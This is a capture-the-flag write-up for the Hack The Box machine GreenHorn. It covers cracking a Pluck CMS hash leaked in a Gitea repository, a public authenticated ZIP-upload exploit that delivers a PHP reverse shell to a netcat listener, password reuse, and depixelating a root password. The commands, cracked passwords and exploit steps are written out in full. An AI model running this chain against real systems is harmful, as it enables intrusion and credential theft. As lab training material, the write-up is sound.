> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2026-03-27

Hack The Box — GreenHorn (Linux)

Pluck CMS credential recovery from exposed repository, authenticated ZIP upload RCE, lateral move to junior, and root access by depixeling a leaked password from a PDF image.

Target

  • IP: 10.129.25.250

Recon

sudo nmap -sC -sV 10.129.25.250 -p- -vv

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 57:d6:92:8a:72:44:84:17:29:eb:5c:c9:63:6a:fe:fd (ECDSA)
|_  256 40:ea:17:b1:b6:c5:3f:42:56:67:4a:3c:ee:75:23:2f (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-generator: pluck 4.7.18
| http-title: Welcome to GreenHorn ! - GreenHorn
|_Requested resource was http://greenhorn.htb/?file=welcome-to-greenhorn
| http-methods:
|_  Supported Methods: GET HEAD POST
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=924c9e8af7b2ade0; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=EKDiDFpfJ5puXcbg3OdkOObwvhA6MTcyMTc2MTA5MTg4MDg3NzgxNw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 23 Jul 2024 18:58:11 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>GreenHorn</title>
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=6feb3f594c7c96cb; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=CLvb-6K3l7XYDq7BE9pSRwxaTxQ6MTcyMTc2MTA5NzIyOTYyNjIyNw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Tue, 23 Jul 2024 18:58:17 GMT
|_    Content-Length: 0

Add greenhorn.htb to /etc/hosts. Go to http://greenhorn.htb/login.php. The site uses Pluck 4.7.18.

Go to http://greenhorn.htb:3000/. It is Gitea. Browse repositories. There is repository GreenAdmin/GreenHorn. Download it.

In data/settings/pass.php, we find a hash:

<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

Save in hash file and crack:

hashcat -a 0 -m 1700 ./hash ./rockyou.txt

d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1

Go to http://greenhorn.htb/login.php and login with found password.

Authenticated RCE via Pluck exploit

Exploit reference:

  • https://www.exploit-db.com/exploits/51592

Download exploit. Replace localhost/pluck with greenhorn.htb. In login_payload, set field cont1 to found password. Change miri.php to php-reverse-shell.php.

cp /usr/share/webshells/php/php-reverse-shell.php .
zip shell.zip php-reverse-shell.php

Start listener:

nc -vlnp 4444

Run exploit and provide path to created ZIP. We get a reverse shell.

User pivot and root

su junior

Use password:

  • iloveyou1

Download PDF from junior home directory. There is a pixelated password. Extract pixelated image (for example with LibreOffice Draw).

Useful tool:

  • https://github.com/spipm/Depix
python3 depix.py -p ../test.png -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o ../test1.png

Open test1.png, result:

sidefromsidetheothersidesidefromsidetheotherside

su root

Use recovered password. We get a root shell.